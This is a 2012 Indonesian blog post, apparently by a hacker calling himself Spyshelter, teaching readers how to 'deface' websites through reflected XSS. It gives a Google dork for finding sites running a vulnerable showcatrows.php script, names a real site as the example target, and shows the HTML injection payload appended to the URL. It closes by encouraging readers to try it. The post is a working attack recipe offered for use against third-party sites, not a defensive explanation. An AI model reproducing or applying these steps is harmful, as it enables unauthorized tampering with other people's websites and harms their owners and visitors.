Sebelumnya udah pada tau belum apa itu XSS Vulnerability? XSS Vulnerability adalah suatu cara memasukan code/script HTML kedalam suatu website dan dijalankan melalui browser di client. Ok deh, Langsung aja kita bahas bersama Cara Deface Website Menggunakan Teknik XSS Vulnerability ini !
1). Pertama, Masukan Dorknya di mesin pencari mbah google dengan kata kunci :
- inurl:"/showcatrows.php?CategoryID="
2). Kalo sudah, Pilih salah satu web yang akan kita deface.
Contoh : saya pakai web ini http://www.ti-com.info/showcatrows.php?CategoryID=6"
3). Jika sudah masuk ke halaman web target, kita modifikasi sedikit URL web target dengan menambahkan tanda "dan > setelah angka, tepatnya pada akhir URL. Lalu tambahkan kode HTML yang berwarna hijau dibelakang target deface kita.
Contoh : http://www.ti-com.info/showcatrows.php?CategoryID=6"><marquee><h1>Hacked by Spyshelter</h1></marquee>
4). Kemudian tekan Enter.
5). Selesai, Website sudah berhasil kita deface plok plok plok yeeeee :D
Triknya memang cukup simpel, dimana kita memanfaatkan celah keamanan pada XSS sebuah website dengan memasukan sebuah code/script HTML.
selamat mencoba dan have fun :D
[Spyshelter] Cara Deface Website Menggunakan Teknik XSS Vulnerability.
![[Spyshelter] Cara Deface Website Menggunakan Teknik XSS Vulnerability.](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL2C5_V2Za0cKzakh1Qx_RpF1hKsWNRB1Mp_CK-3n1AURaE13qrzXgs2yW6sdPcEsz-V7LPZz75x4QqnHavXDoJclDMUUbStwsLisuNnl3gbYMtrOYyp4OGS3u09k6-jpmaGlmfchyE5yP/s72-c/asasa.bmp)
Reviewed by Wahyumiftahulhuda
on
November 25, 2012
Rating:
Reviewed by Wahyumiftahulhuda
on
November 25, 2012
Rating:
Tidak ada komentar: